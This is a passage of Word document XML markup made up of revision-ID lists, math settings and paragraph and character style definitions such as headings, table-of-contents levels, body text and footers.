    <w:rsid w:val="00FE5E41"/>
    <w:rsid w:val="00FE62FD"/>
    <w:rsid w:val="00FE630F"/>
    <w:rsid w:val="00FE7343"/>
    <w:rsid w:val="00FF0F8D"/>
    <w:rsid w:val="00FF10F3"/>
    <w:rsid w:val="00FF14DE"/>
    <w:rsid w:val="00FF2059"/>
    <w:rsid w:val="00FF2188"/>
    <w:rsid w:val="00FF22F6"/>
    <w:rsid w:val="00FF2E3D"/>
    <w:rsid w:val="00FF3308"/>
    <w:rsid w:val="00FF4111"/>
    <w:rsid w:val="00FF4D81"/>
    <w:rsid w:val="00FF5719"/>
    <w:rsid w:val="00FF5A9D"/>
    <w:rsid w:val="00FF617E"/>
    <w:rsid w:val="00FF73B8"/>
    <w:rsid w:val="00FF756D"/>
    <w:rsid w:val="011416D3"/>
    <w:rsid w:val="01BC291B"/>
    <w:rsid w:val="01E81E05"/>
    <w:rsid w:val="027F7376"/>
    <w:rsid w:val="030F5534"/>
    <w:rsid w:val="03776377"/>
    <w:rsid w:val="03ED2ED0"/>
    <w:rsid w:val="03FA54C6"/>
    <w:rsid w:val="046CF4CD"/>
    <w:rsid w:val="06094D31"/>
    <w:rsid w:val="0659AC64"/>
    <w:rsid w:val="067A8C4D"/>
    <w:rsid w:val="06AED178"/>
    <w:rsid w:val="07AF0C6A"/>
    <w:rsid w:val="07B174FF"/>
    <w:rsid w:val="07BDA02D"/>
    <w:rsid w:val="08306DFE"/>
    <w:rsid w:val="0894FF6C"/>
    <w:rsid w:val="08BF0293"/>
    <w:rsid w:val="090F0B2B"/>
    <w:rsid w:val="099E7C3F"/>
    <w:rsid w:val="09B3ECF3"/>
    <w:rsid w:val="09CB2FB7"/>
    <w:rsid w:val="0ABF98DA"/>
    <w:rsid w:val="0AD16C7C"/>
    <w:rsid w:val="0AF14F5C"/>
    <w:rsid w:val="0B161DF0"/>
    <w:rsid w:val="0B6ECF72"/>
    <w:rsid w:val="0CC9AE5F"/>
    <w:rsid w:val="0D187993"/>
    <w:rsid w:val="0D2E2D35"/>
    <w:rsid w:val="0D884F09"/>
    <w:rsid w:val="0DCE8397"/>
    <w:rsid w:val="0EB4665E"/>
    <w:rsid w:val="0EC56E36"/>
    <w:rsid w:val="0F78083E"/>
    <w:rsid w:val="10AACF79"/>
    <w:rsid w:val="10AB2018"/>
    <w:rsid w:val="118892DA"/>
    <w:rsid w:val="11C4CDB7"/>
    <w:rsid w:val="1232A88C"/>
    <w:rsid w:val="124B2885"/>
    <w:rsid w:val="12733688"/>
    <w:rsid w:val="131536F4"/>
    <w:rsid w:val="13D1051F"/>
    <w:rsid w:val="1420658E"/>
    <w:rsid w:val="14301521"/>
    <w:rsid w:val="14C2354D"/>
    <w:rsid w:val="152630A5"/>
    <w:rsid w:val="1655632F"/>
    <w:rsid w:val="16C7C104"/>
    <w:rsid w:val="16D5F394"/>
    <w:rsid w:val="173038D4"/>
    <w:rsid w:val="173A3AEC"/>
    <w:rsid w:val="17DF35CC"/>
    <w:rsid w:val="188E6071"/>
    <w:rsid w:val="19873590"/>
    <w:rsid w:val="19B207BF"/>
    <w:rsid w:val="19EB223A"/>
    <w:rsid w:val="1C075EAA"/>
    <w:rsid w:val="1C26F439"/>
    <w:rsid w:val="1C8D3431"/>
    <w:rsid w:val="1D0A83BE"/>
    <w:rsid w:val="1DBA7E36"/>
    <w:rsid w:val="1DC08E06"/>
    <w:rsid w:val="1DF75108"/>
    <w:rsid w:val="1E0EC8B7"/>
    <w:rsid w:val="1E55954A"/>
    <w:rsid w:val="1E6B00BD"/>
    <w:rsid w:val="1ED7BDD9"/>
    <w:rsid w:val="1EEC3B64"/>
    <w:rsid w:val="1F175D22"/>
    <w:rsid w:val="1F9A0346"/>
    <w:rsid w:val="203F2152"/>
    <w:rsid w:val="2161361E"/>
    <w:rsid w:val="217427AB"/>
    <w:rsid w:val="2192430B"/>
    <w:rsid w:val="21AA5B82"/>
    <w:rsid w:val="22093C33"/>
    <w:rsid w:val="2222D0BE"/>
    <w:rsid w:val="2226C775"/>
    <w:rsid w:val="22529219"/>
    <w:rsid w:val="22C91E89"/>
    <w:rsid w:val="234EA093"/>
    <w:rsid w:val="238D7706"/>
    <w:rsid w:val="240C871B"/>
    <w:rsid w:val="249F634E"/>
    <w:rsid w:val="24F7A74C"/>
    <w:rsid w:val="252AFF6E"/>
    <w:rsid w:val="26374B70"/>
    <w:rsid w:val="26517499"/>
    <w:rsid w:val="27504325"/>
    <w:rsid w:val="2774D956"/>
    <w:rsid w:val="28335F08"/>
    <w:rsid w:val="2847B3FC"/>
    <w:rsid w:val="284DDF0A"/>
    <w:rsid w:val="28F96AAB"/>
    <w:rsid w:val="290A42B0"/>
    <w:rsid w:val="291A2A7B"/>
    <w:rsid w:val="295F188B"/>
    <w:rsid w:val="29667AA3"/>
    <w:rsid w:val="2974C7A3"/>
    <w:rsid w:val="29E5D3DD"/>
    <w:rsid w:val="29F4CFCE"/>
    <w:rsid w:val="29F7B1DA"/>
    <w:rsid w:val="2A23AEA7"/>
    <w:rsid w:val="2AC610CF"/>
    <w:rsid w:val="2B759FBA"/>
    <w:rsid w:val="2B8E3CE5"/>
    <w:rsid w:val="2BFA4357"/>
    <w:rsid w:val="2C648BB0"/>
    <w:rsid w:val="2C653FAE"/>
    <w:rsid w:val="2CB2A741"/>
    <w:rsid w:val="2F6FA99F"/>
    <w:rsid w:val="2FD34A75"/>
    <w:rsid w:val="306EDB41"/>
    <w:rsid w:val="309364BC"/>
    <w:rsid w:val="30947F66"/>
    <w:rsid w:val="30A88A85"/>
    <w:rsid w:val="30D77846"/>
    <w:rsid w:val="30EF0094"/>
    <w:rsid w:val="3119B4F7"/>
    <w:rsid w:val="314640E7"/>
    <w:rsid w:val="32AED7DE"/>
    <w:rsid w:val="3360E5DD"/>
    <w:rsid w:val="34433079"/>
    <w:rsid w:val="3447F68C"/>
    <w:rsid w:val="34EB94DC"/>
    <w:rsid w:val="34F9F025"/>
    <w:rsid w:val="35250A52"/>
    <w:rsid w:val="3567E6B4"/>
    <w:rsid w:val="3749B39A"/>
    <w:rsid w:val="37FF181F"/>
    <w:rsid w:val="3809EC81"/>
    <w:rsid w:val="3830FBE8"/>
    <w:rsid w:val="3875FA5A"/>
    <w:rsid w:val="38774E48"/>
    <w:rsid w:val="38AA3BA6"/>
    <w:rsid w:val="38F7F7FF"/>
    <w:rsid w:val="39517ECC"/>
    <w:rsid w:val="399B5C4F"/>
    <w:rsid w:val="39A7CBA6"/>
    <w:rsid w:val="39E2324E"/>
    <w:rsid w:val="3A2DEF81"/>
    <w:rsid w:val="3A3089E4"/>
    <w:rsid w:val="3A6FC043"/>
    <w:rsid w:val="3AD395F1"/>
    <w:rsid w:val="3B14B6CA"/>
    <w:rsid w:val="3BA980B8"/>
    <w:rsid w:val="3BDDE454"/>
    <w:rsid w:val="3C7A1387"/>
    <w:rsid w:val="3C8C28D4"/>
    <w:rsid w:val="3CA4D6E1"/>
    <w:rsid w:val="3CCAEB39"/>
    <w:rsid w:val="3D803051"/>
    <w:rsid w:val="3EAB24F4"/>
    <w:rsid w:val="3EE2B4BE"/>
    <w:rsid w:val="3EE535E3"/>
    <w:rsid w:val="3EF144FC"/>
    <w:rsid w:val="3F65257E"/>
    <w:rsid w:val="402A37DF"/>
    <w:rsid w:val="40F47485"/>
    <w:rsid w:val="4100D223"/>
    <w:rsid w:val="4165282F"/>
    <w:rsid w:val="41B56FC7"/>
    <w:rsid w:val="41F19C21"/>
    <w:rsid w:val="4223D3E7"/>
    <w:rsid w:val="42513267"/>
    <w:rsid w:val="42DCFEF5"/>
    <w:rsid w:val="436DBF29"/>
    <w:rsid w:val="436E0368"/>
    <w:rsid w:val="43B6D425"/>
    <w:rsid w:val="43CEF484"/>
    <w:rsid w:val="440B45F4"/>
    <w:rsid w:val="44538FD9"/>
    <w:rsid w:val="44A4E63C"/>
    <w:rsid w:val="45016FF1"/>
    <w:rsid w:val="450A464A"/>
    <w:rsid w:val="45620BAC"/>
    <w:rsid w:val="45F4F27E"/>
    <w:rsid w:val="46D21D5A"/>
    <w:rsid w:val="46E8AD3B"/>
    <w:rsid w:val="47B75D4E"/>
    <w:rsid w:val="4845A294"/>
    <w:rsid w:val="48763796"/>
    <w:rsid w:val="48EDE561"/>
    <w:rsid w:val="4948777A"/>
    <w:rsid w:val="4977A0C8"/>
    <w:rsid w:val="4A1FE080"/>
    <w:rsid w:val="4B298059"/>
    <w:rsid w:val="4B31AFB4"/>
    <w:rsid w:val="4BC714A6"/>
    <w:rsid w:val="4BFA2356"/>
    <w:rsid w:val="4BFE1CBF"/>
    <w:rsid w:val="4C3ABA09"/>
    <w:rsid w:val="4C3B6F2C"/>
    <w:rsid w:val="4D26B181"/>
    <w:rsid w:val="4D451BE1"/>
    <w:rsid w:val="4D7FE1C7"/>
    <w:rsid w:val="4DD40EC9"/>
    <w:rsid w:val="4DD91FB0"/>
    <w:rsid w:val="4DF275F5"/>
    <w:rsid w:val="4E00EFCA"/>
    <w:rsid w:val="4E22224B"/>
    <w:rsid w:val="4E505825"/>
    <w:rsid w:val="4F6B5FE4"/>
    <w:rsid w:val="4FA1AF99"/>
    <w:rsid w:val="50772B9C"/>
    <w:rsid w:val="50C80F06"/>
    <w:rsid w:val="50FA60EF"/>
    <w:rsid w:val="511508E8"/>
    <w:rsid w:val="51B2FB96"/>
    <w:rsid w:val="52E00D1D"/>
    <w:rsid w:val="52F80B61"/>
    <w:rsid w:val="530B04A8"/>
    <w:rsid w:val="53BB567B"/>
    <w:rsid w:val="53F6C94D"/>
    <w:rsid w:val="540ECF98"/>
    <w:rsid w:val="544BADE9"/>
    <w:rsid w:val="546AAA22"/>
    <w:rsid w:val="54CF5A3F"/>
    <w:rsid w:val="557BA10B"/>
    <w:rsid w:val="5617443F"/>
    <w:rsid w:val="565B3594"/>
    <w:rsid w:val="56A15A06"/>
    <w:rsid w:val="571B55DB"/>
    <w:rsid w:val="57892A35"/>
    <w:rsid w:val="57A51E84"/>
    <w:rsid w:val="5873CE13"/>
    <w:rsid w:val="58D28D89"/>
    <w:rsid w:val="5A0EC277"/>
    <w:rsid w:val="5A2A408E"/>
    <w:rsid w:val="5B18B8D4"/>
    <w:rsid w:val="5B3394B9"/>
    <w:rsid w:val="5BA491C6"/>
    <w:rsid w:val="5BB3FB36"/>
    <w:rsid w:val="5BE980F2"/>
    <w:rsid w:val="5C33BDE2"/>
    <w:rsid w:val="5C978C76"/>
    <w:rsid w:val="5CB91068"/>
    <w:rsid w:val="5CCBBFC3"/>
    <w:rsid w:val="5D785C13"/>
    <w:rsid w:val="5E4248D6"/>
    <w:rsid w:val="5F0348BF"/>
    <w:rsid w:val="5FC400FA"/>
    <w:rsid w:val="5FE58E72"/>
    <w:rsid w:val="602986C1"/>
    <w:rsid w:val="61EBED56"/>
    <w:rsid w:val="624D80FE"/>
    <w:rsid w:val="6299753C"/>
    <w:rsid w:val="62D62250"/>
    <w:rsid w:val="63B205A3"/>
    <w:rsid w:val="63D07F38"/>
    <w:rsid w:val="646325F4"/>
    <w:rsid w:val="64917AAE"/>
    <w:rsid w:val="64AB8688"/>
    <w:rsid w:val="64F4EB37"/>
    <w:rsid w:val="64F91AB4"/>
    <w:rsid w:val="65116661"/>
    <w:rsid w:val="65453979"/>
    <w:rsid w:val="65BDD4F0"/>
    <w:rsid w:val="660E2B54"/>
    <w:rsid w:val="66A2D987"/>
    <w:rsid w:val="66C68270"/>
    <w:rsid w:val="66C69A41"/>
    <w:rsid w:val="6756B77F"/>
    <w:rsid w:val="67B99413"/>
    <w:rsid w:val="682CB825"/>
    <w:rsid w:val="683C6974"/>
    <w:rsid w:val="6845FCFF"/>
    <w:rsid w:val="68A58D75"/>
    <w:rsid w:val="68BC1F60"/>
    <w:rsid w:val="690144D7"/>
    <w:rsid w:val="690B9498"/>
    <w:rsid w:val="6918B19F"/>
    <w:rsid w:val="6A2099CF"/>
    <w:rsid w:val="6A755041"/>
    <w:rsid w:val="6AEAD77E"/>
    <w:rsid w:val="6BB59A48"/>
    <w:rsid w:val="6BBFDBE2"/>
    <w:rsid w:val="6BF21DC8"/>
    <w:rsid w:val="6C261DB2"/>
    <w:rsid w:val="6D133685"/>
    <w:rsid w:val="6D6A44FD"/>
    <w:rsid w:val="6D7FEF79"/>
    <w:rsid w:val="6DB8F429"/>
    <w:rsid w:val="6DF3D7CD"/>
    <w:rsid w:val="6E5B472A"/>
    <w:rsid w:val="6E7D8F42"/>
    <w:rsid w:val="6EB075FE"/>
    <w:rsid w:val="6EFC9E73"/>
    <w:rsid w:val="6EFF74C6"/>
    <w:rsid w:val="6FF9BFE1"/>
    <w:rsid w:val="706394DB"/>
    <w:rsid w:val="70670437"/>
    <w:rsid w:val="70C448EA"/>
    <w:rsid w:val="71413687"/>
    <w:rsid w:val="71721596"/>
    <w:rsid w:val="729EF11E"/>
    <w:rsid w:val="7333D4ED"/>
    <w:rsid w:val="7393195C"/>
    <w:rsid w:val="73C27832"/>
    <w:rsid w:val="73E33305"/>
    <w:rsid w:val="74563712"/>
    <w:rsid w:val="74FBF1CF"/>
    <w:rsid w:val="76372821"/>
    <w:rsid w:val="7697F369"/>
    <w:rsid w:val="76F39A67"/>
    <w:rsid w:val="77358BBC"/>
    <w:rsid w:val="77AA56DF"/>
    <w:rsid w:val="77E4A959"/>
    <w:rsid w:val="77ECFDD6"/>
    <w:rsid w:val="78CBCD8D"/>
    <w:rsid w:val="7955228A"/>
    <w:rsid w:val="7B9F8C04"/>
    <w:rsid w:val="7BC113DE"/>
    <w:rsid w:val="7C7A6E0C"/>
    <w:rsid w:val="7D54261C"/>
    <w:rsid w:val="7DE7A6D7"/>
    <w:rsid w:val="7E633FBE"/>
    <w:rsid w:val="7EB89CDD"/>
    <w:rsid w:val="7EFA4ED2"/>
    <w:rsid w:val="7F2C5844"/>
    <w:rsid w:val="7F3C1250"/>
  </w:rsids>
  <m:mathPr>
    <m:mathFont m:val="Cambria Math"/>
    <m:brkBin m:val="before"/>
    <m:brkBinSub m:val="--"/>
    <m:smallFrac m:val="0"/>
    <m:dispDef m:val="0"/>
    <m:lMargin m:val="0"/>
    <m:rMargin m:val="0"/>
    <m:defJc m:val="centerGroup"/>
    <m:wrapRight/>
    <m:intLim m:val="subSup"/>
    <m:naryLim m:val="subSup"/>
  </m:mathPr>
  <w:themeFontLang w:val="en-SG"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7A700E"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{36AE3141-2C6C-405A-97B5-A06B32500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4946"/>
    <w:pPr>
      <w:widowControl w:val="0"/>
      <w:overflowPunct w:val="0"/>
      <w:autoSpaceDE w:val="0"/>
      <w:autoSpaceDN w:val="0"/>
      <w:adjustRightInd w:val="0"/>
      <w:textAlignment w:val="baseline"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="24"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading1">
    <w:name w:val="heading 1"/>
    <w:aliases w:val="Heading 1 - Report"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="006936E1"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:kern w:val="28"/>
      <w:sz w:val="36"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading2">
    <w:name w:val="heading 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading2Char"/>
    <w:qFormat/>
    <w:rsid w:val="00BB6865"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="1"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="32"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:qFormat/>
    <w:rsid w:val="00BB6865"/>
    <w:pPr>
      <w:keepNext/>
      <w:spacing w:before="240" w:after="60"/>
      <w:outlineLvl w:val="2"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:sz w:val="28"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading4">
    <w:name w:val="heading 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:ind w:firstLine="720"/>
      <w:outlineLvl w:val="3"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading5">
    <w:name w:val="heading 5"/>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outlineLvl w:val="4"/>
    </w:pPr>
    <w:rPr>
      <w:i/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading6">
    <w:name w:val="heading 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:keepNext/>
      <w:suppressAutoHyphens/>
      <w:outlineLvl w:val="5"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:spacing w:val="-3"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading7">
    <w:name w:val="heading 7"/>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outlineLvl w:val="6"/>
    </w:pPr>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:iCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Heading9">
    <w:name w:val="heading 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
    <w:rsid w:val="002323F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pPr>
      <w:spacing w:before="120" w:after="120"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:b/>
      <w:bCs/>
      <w:caps/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC2">
    <w:name w:val="toc 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="240"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:smallCaps/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC3">
    <w:name w:val="toc 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="39"/>
    <w:pPr>
      <w:ind w:left="480"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:i/>
      <w:iCs/>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC4">
    <w:name w:val="toc 4"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC5">
    <w:name w:val="toc 5"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="960"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC6">
    <w:name w:val="toc 6"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="1200"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC7">
    <w:name w:val="toc 7"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="1440"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC8">
    <w:name w:val="toc 8"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="1680"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOC9">
    <w:name w:val="toc 9"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:ind w:left="1920"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index1">
    <w:name w:val="index 1"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:leader="dot" w:pos="9000"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:ind w:left="1440" w:right="720" w:hanging="1440"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Index2">
    <w:name w:val="index 2"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:leader="dot" w:pos="9000"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:ind w:left="1440" w:right="720" w:hanging="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="TOAHeading">
    <w:name w:val="toa heading"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:semiHidden/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="9000"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:qFormat/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="EquationCaption">
    <w:name w:val="_Equation Caption"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="FooterChar"/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="PageNumber">
    <w:name w:val="page number"/>
    <w:rPr>
      <w:sz w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Header">
    <w:name w:val="header"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="HeaderChar"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4320"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent2">
    <w:name w:val="Body Text Indent 2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="right" w:pos="-180"/>
        <w:tab w:val="right" w:pos="8640"/>
      </w:tabs>
      <w:ind w:left="1440" w:hanging="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="List2">
    <w:name w:val="List 2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:ind w:left="720" w:hanging="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="ListBullet2">
    <w:name w:val="List Bullet 2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="720"/>
      </w:tabs>
      <w:ind w:left="720" w:hanging="360"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText">
    <w:name w:val="Body Text"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:spacing w:after="120"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText2">
    <w:name w:val="Body Text 2"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
      <w:spacing w:val="-3"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalIndent">
    <w:name w:val="Normal Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:ind w:left="720"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyText3">
    <w:name w:val="Body Text 3"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="-720"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Bookman Old Style" w:hAnsi="Bookman Old Style"/>
      <w:spacing w:val="-3"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent">
    <w:name w:val="Body Text Indent"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="-720"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:ind w:left="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Palatino" w:hAnsi="Palatino"/>
      <w:b/>
      <w:spacing w:val="-3"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BodyTextIndent3">
    <w:name w:val="Body Text Indent 3"/>
    <w:basedOn w:val="Normal"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="left" w:pos="-720"/>
      </w:tabs>
      <w:suppressAutoHyphens/>
      <w:ind w:left="720" w:hanging="720"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Palatino" w:hAnsi="Palatino"/>
      <w:spacing w:val="-3"/>
      <w:lang w:val="en-GB"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00C90FEF"/>
    <w:rPr>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="BalloonText">
    <w:name w:val="Balloon Text"/>
    <w:basedOn w:val="Normal"/>
    <w:semiHidden/>
    <w:rsid w:val="00DA556B"/>
    <w:rPr>
      <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="TitleChar"/>
    <w:qFormat/>
    <w:rsid w:val="00146C51"/>
    <w:pPr>
      <w:widowControl/>
      <w:jc w:val="center"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Palatino" w:hAnsi="Palatino"/>
      <w:b/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="TitleChar">
    <w:name w:val="Title Char"/>
    <w:link w:val="Title"/>
    <w:rsid w:val="00146C51"/>
    <w:rPr>
      <w:rFonts w:ascii="Palatino" w:hAnsi="Palatino"/>
      <w:b/>
      <w:sz w:val="28"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="FooterChar">
    <w:name w:val="Footer Char"/>
    <w:link w:val="Footer"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00694E81"/>
    <w:rPr>
      <w:rFonts w:ascii="Courier" w:hAnsi="Courier"/>
      <w:lang w:val="en-US" w:eastAsia="en-US"/>
    </w:rPr>
  </w:style>
  <w:style w:type="table" w:styleId="TableGrid">
    <w:name w:val="Table Grid"/>
    <w:basedOn w:val="TableNormal"/>
    <w:rsid w:val="000827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BB6865"/>
    <w:rPr>
